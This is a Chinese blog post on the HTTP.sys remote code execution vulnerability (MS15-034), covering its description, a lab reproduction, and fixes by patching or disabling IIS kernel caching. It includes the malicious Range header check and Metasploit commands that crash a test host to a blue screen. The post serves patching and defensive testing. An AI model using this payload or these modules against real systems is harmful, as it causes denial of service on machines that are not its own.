HTTP.sys远程代码执行漏洞修复

HTTP.sys远程代码执行漏洞修复1.漏洞描述Http.sys是MicrosoftWindows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer2008R2和WindowsServer2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通

大家好,又见面了,我是你们的朋友全栈君。

1.漏洞描述

Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。

2.复现环境

win7+IIS7

3.漏洞确认

访问IIS界面,使用burpsuite抓包,发送到repeater中,在HTTP请求头中加入如下字段
Range: bytes=18-18446744073709551615 ,返回416状态码
在这里插入图片描述

4.漏洞利用

使用kali的metasploit
msconsole
search ms15-034
在这里插入图片描述
验证漏洞的方法
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.1.200
run
在这里插入图片描述
利用漏洞的方法
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.1.200
set threads 10
run
在这里插入图片描述
实验电脑已经蓝屏

5.漏洞修复

方法1:微软官方网站下载ms15-034的补丁包
下载地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
代表性补丁:
Windows Server 2008 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46480
Windows Server 2012(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46481
Windows Server 2012 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46500

方法2:网上的其他方法验证
IIS-功能视图-输出缓存-操作-编辑功能设置-启用内核缓存,取消勾选。
注意:
在网站-default web site下的输出缓存,不是根目录下的输出缓存;
修改后,漏洞验证仍显示存在,但漏洞利用已不再蓝屏;

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/161443.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号